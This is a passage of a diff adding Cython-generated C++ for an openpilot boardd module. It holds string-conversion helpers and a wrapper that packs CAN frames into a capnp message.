<<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyUnicode_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyObject_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyUnicode_string_to_py_std__in_string", 0); + + /* "string.to_py":38 + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyStr_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyUnicode_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyUnicode_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyStr_string_to_py_std__in_string", 0); + + /* "string.to_py":44 + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyBytes_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyStr_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyStr_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyBytes_string_to_py_std__in_string", 0); + + /* "string.to_py":50 + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyByteArray_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyBytes_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyByteArray_string_to_py_std__in_string", 0); + + /* "string.to_py":56 + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyByteArray_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyByteArray_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "selfdrive/boardd/boardd_api_impl.pyx":17 + * void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) + * + * def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): # <<<<<<<<<<<<<< + * cdef vector[can_frame] can_list + * can_list.reserve(len(can_msgs)) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_9selfdrive_6boardd_15boardd_api_impl_1can_list_to_can_capnp(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_9selfdrive_6boardd_15boardd_api_impl_1can_list_to_can_capnp = {"can_list_to_can_capnp", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9selfdrive_6boardd_15boardd_api_impl_1can_list_to_can_capnp, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_9selfdrive_6boardd_15boardd_api_impl_1can_list_to_can_capnp(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_can_msgs = 0; + PyObject *__pyx_v_msgtype = 0; + PyObject *__pyx_v_valid = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("can_list_to_can_capnp (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_can_msgs,&__pyx_n_s_msgtype,&__pyx_n_s_valid,0}; + PyObject* values[3] = {0,0,0}; + values[1] = ((PyObject *)((PyObject*)__pyx_n_u_can)); + values[2] = ((PyObject *)((PyObject *)Py_True)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_can_msgs)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_msgtype); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_valid); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "can_list_to_can_capnp") < 0)) __PYX_ERR(1, 17, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_can_msgs = values[0]; + __pyx_v_msgtype = values[1]; + __pyx_v_valid = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("can_list_to_can_capnp", 0, 1, 3, __pyx_nargs); __PYX_ERR(1, 17, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("selfdrive.boardd.boardd_api_impl.can_list_to_can_capnp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_9selfdrive_6boardd_15boardd_api_impl_can_list_to_can_capnp(__pyx_self, __pyx_v_can_msgs, __pyx_v_msgtype, __pyx_v_valid); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_9selfdrive_6boardd_15boardd_api_impl_can_list_to_can_capnp(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_can_msgs, PyObject *__pyx_v_msgtype, PyObject *__pyx_v_valid) { + std::vector __pyx_v_can_list; + struct can_frame __pyx_v_f; + PyObject *__pyx_v_can_msg = NULL; + std::string __pyx_v_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + long __pyx_t_5; + std::string __pyx_t_6; + bool __pyx_t_7; + bool __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("can_list_to_can_capnp", 0); + + /* "selfdrive/boardd/boardd_api_impl.pyx":19 + * def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): + * cdef vector[can_frame] can_list + * can_list.reserve(len(can_msgs)) # <<<<<<<<<<<<<< + * + * cdef can_frame f + */ + __pyx_t_1 = PyObject_Length(__pyx_v_can_msgs); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(1, 19, __pyx_L1_error) + try { + __pyx_v_can_list.reserve(__pyx_t_1); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 19, __pyx_L1_error) + } + + /* "selfdrive/boardd/boardd_api_impl.pyx":22 + * + * cdef can_frame f + * for can_msg in can_msgs: # <<<<<<<<<<<<<< + * f.address = can_msg[0] + * f.busTime = can_msg[1] + */ + if (likely(PyList_CheckExact(__pyx_v_can_msgs)) || PyTuple_CheckExact(__pyx_v_can_msgs)) { + __pyx_t_2 = __pyx_v_can_msgs; __Pyx_INCREF(__pyx_t_2); __pyx_t_1 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_1 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_can_msgs); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 22, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_1 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_1); __Pyx_INCREF(__pyx_t_4); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 22, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_2, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_1 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_1); __Pyx_INCREF(__pyx_t_4); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 22, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_2, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_2); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 22, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_can_msg, __pyx_t_4); + __pyx_t_4 = 0; + + /* "selfdrive/boardd/boardd_api_impl.pyx":23 + * cdef can_frame f + * for can_msg in can_msgs: + * f.address = can_msg[0] # <<<<<<<<<<<<<< + * f.busTime = can_msg[1] + * f.dat = can_msg[2] + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_can_msg, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyInt_As_long(__pyx_t_4); if (unlikely((__pyx_t_5 == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_f.address = __pyx_t_5; + + /* "selfdrive/boardd/boardd_api_impl.pyx":24 + * for can_msg in can_msgs: + * f.address = can_msg[0] + * f.busTime = can_msg[1] # <<<<<<<<<<<<<< + * f.dat = can_msg[2] + * f.src = can_msg[3] + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_can_msg, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyInt_As_long(__pyx_t_4); if (unlikely((__pyx_t_5 == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 24, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_f.busTime = __pyx_t_5; + + /* "selfdrive/boardd/boardd_api_impl.pyx":25 + * f.address = can_msg[0] + * f.busTime = can_msg[1] + * f.dat = can_msg[2] # <<<<<<<<<<<<<< + * f.src = can_msg[3] + * can_list.push_back(f) + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_can_msg, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __pyx_convert_string_from_py_std__in_string(__pyx_t_4); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 25, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_f.dat = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_6); + + /* "selfdrive/boardd/boardd_api_impl.pyx":26 + * f.busTime = can_msg[1] + * f.dat = can_msg[2] + * f.src = can_msg[3] # <<<<<<<<<<<<<< + * can_list.push_back(f) + * cdef string out + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_can_msg, 3, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 26, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyInt_As_long(__pyx_t_4); if (unlikely((__pyx_t_5 == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 26, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_f.src = __pyx_t_5; + + /* "selfdrive/boardd/boardd_api_impl.pyx":27 + * f.dat = can_msg[2] + * f.src = can_msg[3] + * can_list.push_back(f) # <<<<<<<<<<<<<< + * cdef string out + * can_list_to_can_capnp_cpp(can_list, out, msgtype == 'sendcan', valid) + */ + try { + __pyx_v_can_list.push_back(__pyx_v_f); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 27, __pyx_L1_error) + } + + /* "selfdrive/boardd/boardd_api_impl.pyx":22 + * + * cdef can_frame f + * for can_msg in can_msgs: # <<<<<<<<<<<<<< + * f.address = can_msg[0] + * f.busTime = can_msg[1] + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "selfdrive/boardd/boardd_api_impl.pyx":29 + * can_list.push_back(f) + * cdef string out + * can_list_to_can_capnp_cpp(can_list, out, msgtype == 'sendcan', valid) # <<<<<<<<<<<<<< + * return out + */ + __pyx_t_2 = PyObject_RichCompare(__pyx_v_msgtype, __pyx_n_u_sendcan, Py_EQ); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 29, __pyx_L1_error) + __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_7 == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_v_valid); if (unlikely((__pyx_t_8 == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(1, 29, __pyx_L1_error) + can_list_to_can_capnp_cpp(__pyx_v_can_list, __pyx_v_out, __pyx_t_7, __pyx_t_8); + + /* "selfdrive/boardd/boardd_api_impl.pyx":30 + * cdef string out + * can_list_to_can_capnp_cpp(can_list, out, msgtype == 'sendcan', valid) + * return out # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_out); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 30, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "selfdrive/boardd/boardd_api_impl.pyx":17 + * void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) + * + * def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): # <<<<<<<<<<<<<< + * cdef vector[can_frame] can_list + * can_list.reserve(len(can_msgs)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("selfdrive.boardd.boardd_api_impl.can_list_to_can_capnp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_can_msg); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_n_s__4, __pyx_k__4, sizeof(__pyx_k__4), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_u_can, __pyx_k_can, sizeof(__pyx_k_can), 0, 1, 0, 1}, + {&__pyx_n_s_can_list, __pyx_k_can_list, sizeof(__pyx_k_can_list), 0, 0, 1, 1}, + {&__pyx_n_s_can_list_to_can_capnp, __pyx_k_can_list_to_can_capnp, sizeof(__pyx_k_can_list_to_can_capnp), 0, 0, 1, 1}, + {&__pyx_n_s_can_msg, __pyx_k_can_msg, sizeof(__pyx_k_can_msg), 0, 0, 1, 1}, + {&__pyx_n_s_can_msgs, __pyx_k_can_msgs, sizeof(__pyx_k_can_msgs), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_f, __pyx_k_f, sizeof(__pyx_k_f), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_msgtype, __pyx_k_msgtype, sizeof(__pyx_k_msgtype), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_out, __pyx_k_out, sizeof(__pyx_k_out), 0, 0, 1, 1}, + {&__pyx_kp_s_selfdrive_boardd_boardd_api_impl, __pyx_k_selfdrive_boardd_boardd_api_impl, sizeof(__pyx_k_selfdrive_boardd_boardd_api_impl), 0, 0, 1, 0}, + {&__pyx_n_s_selfdrive_boardd_boardd_api_impl_2, __pyx_k_selfdrive_boardd_boardd_api_impl_2, sizeof(__pyx_k_selfdrive_boardd_boardd_api_impl_2), 0, 0, 1, 1}, + {&__pyx_n_u_sendcan, __pyx_k_sendcan, sizeof(__pyx_k_sendcan), 0, 1, 0, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_valid, __pyx_k_valid, sizeof(__pyx_k_valid), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + return 0; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "selfdrive/boardd/boardd_api_impl.pyx":17 + * void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) + * + * def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): # <<<<<<<<<<<<<< + * cdef vector[can_frame] can_list + * can_list.reserve(len(can_msgs)) + */ + __pyx_tuple_ = PyTuple_Pack(7, __pyx_n_s_can_msgs, __pyx_n_s_msgtype, __pyx_n_s_valid, __pyx_n_s_can_list, __pyx_n_s_f, __pyx_n_s_can_msg, __pyx_n_s_out); if (unlikely(!__pyx_tuple_)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple_); + __Pyx_GIVEREF(__pyx_tuple_); + __pyx_codeobj__2 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple_, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_selfdrive_boardd_boardd_api_impl, __pyx_n_s_can_list_to_can_capnp, 17, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__2)) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_tuple__3 = PyTuple_Pack(2, 